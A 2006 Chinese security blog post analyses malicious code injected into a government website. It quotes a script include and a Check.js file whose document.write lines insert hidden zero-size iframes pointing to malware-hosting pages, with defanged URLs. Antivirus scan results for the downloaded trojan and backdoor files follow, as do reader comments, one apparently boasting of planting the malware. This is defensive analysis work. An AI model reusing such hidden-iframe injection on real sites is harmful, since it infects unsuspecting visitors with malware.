某政府网站被加入的自动下载病毒文件的代码变了花样(第3版)
关键词: 网站,病毒endurer 原创
*2006.02.11 第3版 江民KV2006将xxxxx.pif报为Backdoor/Huigezi.arz
*2006.02.09 第2版 瑞星2006将xxxxx.pif报为Backdoor.Gpigeon.adg(18.09.21版本加入)
*2006.01.05 第1版
今天在浏览前几天刚发现的那个被加了被加入自动下载病毒文件的代码的政府网站时( 详见: 某政府网站被加入自动下载病毒文件的代码(第2版) ),发现其中自动下载病毒文件的代码变了,转了一次弯。
首先是使用:
〈script src=hxxp://www.****5166.com/tour/Check.js></script〉
来引入文件Check.js。
而这个Check.js的内容为:
document.write("<iframe height=0 width=0 src=hxxp://www.***csedu.gov.cn/workOA/good/index.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://www.***hjonline.zk.cn/muma/mm.htm></iframe>");
document.write("<iframe height=0 width=0 src=hxxp://whc330330.***go.3322.org></iframe>");
浏览器在打开
hxxp://www.***csedu.gov.cn/workOA/good/index.htm
时会自动转到
hxxp://www.***csedu.gov.cn/workOA/good/nt.htm
(nt.htm被Kaspersky将报为Trojan-Downloader.JS.Agent.h)。
浏览器在打开nt.htm时则会自动下载:
1. hxxp://www.***csedu.gov.cn/workOA/good/mmmmm.gif
http://virusscan.jotti.org/扫描的结果:
| File: | mmmmm.gif |
| Status: | INFECTED/MALWARE |
| MD5 | ac49ef4f23c35cdd5830fb691890ef47 |
| Packers detected: | - |
Scanner results | |
| AntiVir | Found nothing |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found Trojan.DownLoader.5583 |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found Exploit.JS.Phel.m |
| NOD32 | Found nothing |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |
2。hxxp://www.***csedu.gov.cn/workOA/good/xxxxx.pif
*2006.02.09补充 瑞星2006将xxxxx.pif报为Backdoor.Gpigeon.adg(18.09.21版本加入)
*2006.02.11补充 江民KV2006将xxxxx.pif报为Backdoor/Huigezi.arz
http://virusscan.jotti.org/扫描的结果:
| File: | xxxxx.pif |
| Status: | POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database) |
| MD5 | 286fd19874a5558a479187c253a4909f |
| Packers detected: | - |
Scanner results | |
| AntiVir | Found Heuristic/Trojan.PwdStealer (probable variant) |
| ArcaVir | Found nothing |
| Avast | Found nothing |
| AVG Antivirus | Found nothing |
| BitDefender | Found nothing |
| ClamAV | Found nothing |
| Dr.Web | Found nothing |
| F-Prot Antivirus | Found nothing |
| Fortinet | Found nothing |
| Kaspersky Anti-Virus | Found nothing |
| NOD32 | Found probably a variant of Win32/Hupigon (probable variant) |
| Norman Virus Control | Found nothing |
| UNA | Found nothing |
| VBA32 | Found nothing |
3。hxxp://***.****xuemulove.com/a.gif(可能已不存在,未能获取)
Trackback
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=4109973
回复
|
- 评论人:怎么搞病毒呀
2007-04-29 21:39:24
|
|||
怎么搞病毒呀 |
||||
|
|
- 评论人:怎么搞病毒呀
2007-04-29 21:39:13
|
|||
怎么搞病毒呀 |
||||
|
|
- 评论人:RAR
2006-01-08 09:47:15
|
|||
靠 搜索引擎上都能搜索到自己的毒 哈哈 那些就是我下的 都好久了 难道还在网上挂着没被杀呢? |
||||
